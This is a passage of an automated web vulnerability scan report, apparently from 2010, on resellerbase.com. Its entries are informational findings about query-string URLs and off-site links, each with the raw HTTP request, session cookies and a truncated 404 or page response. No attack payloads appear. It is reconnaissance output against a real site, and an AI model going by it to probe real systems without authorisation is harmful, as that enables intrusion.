Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.270. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /goods-wholesale/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.271. http://www.resellerbase.com/goods-wholesale/themes/kosmos/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /goods-wholesale/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.272. http://www.resellerbase.com/goods-wholesale/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /goods-wholesale/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.273. http://www.resellerbase.com/login.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /login.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /login.php?f=1&b=%2Fcp%2F HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://www.resellerbase.com/add.php
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:02:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Content-Type: text/html
Content-Length: 9223

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login Required</titl
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.274. http://www.resellerbase.com/modify.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /modify.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /modify.php?id=555-555-0199@example.com&pflag=pass&submit=Submit HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/modify.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:00:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Update a Listing</ti
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.275. http://www.resellerbase.com/new.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /new.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /new.php?st=date&dt=1288843200 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/new.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:59:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 11931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>New Listings</title>
...[SNIP]...
<td width="616" height="20" valign="middle" bgcolor="#ececec">
<a href="http://hubshout.com" name="link_46"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://hubshout.com" name="link_46"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.276. http://www.resellerbase.com/other/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /other/

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/other/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.277. http://www.resellerbase.com/other/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /other/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /other/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.278. http://www.resellerbase.com/power_search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /power_search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /power_search.php?features%255b%255d=2&cat=7&title=555-555-0199@example.com&price=555-555-0199@example.com&email=wiener@example.com&contact_name=Peter%2bWiener&pflag=search&submit=Search&url=555-555-0199@example.com HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/power_search.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:57:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9591

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Power Search</title>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.279. http://www.resellerbase.com/rating.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /rating.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /rating.php?id=555-555-0199@example.com&rating=4 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/get_rated.php?id=555-555-0199@example.com&pflag=view&submit=Submit
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:11:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8239

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Rate a link</title>

...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.280. http://www.resellerbase.com/resources-information/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /resources-information/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.281. http://www.resellerbase.com/resources-information/ebooks/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /resources-information/ebooks/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.282. http://www.resellerbase.com/resources-information/ebooks/googlepr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/googlepr.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /resources-information/ebooks/googlepr.php?link_id=11 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.283. http://www.resellerbase.com/resources-information/ebooks/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /resources-information/ebooks/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.284. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /resources-information/ebooks/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.285. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/review/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /resources-information/ebooks/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.286. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /resources-information/ebooks/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.287. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /resources-information/ebooks/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.288. http://www.resellerbase.com/resources-information/ebooks/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:
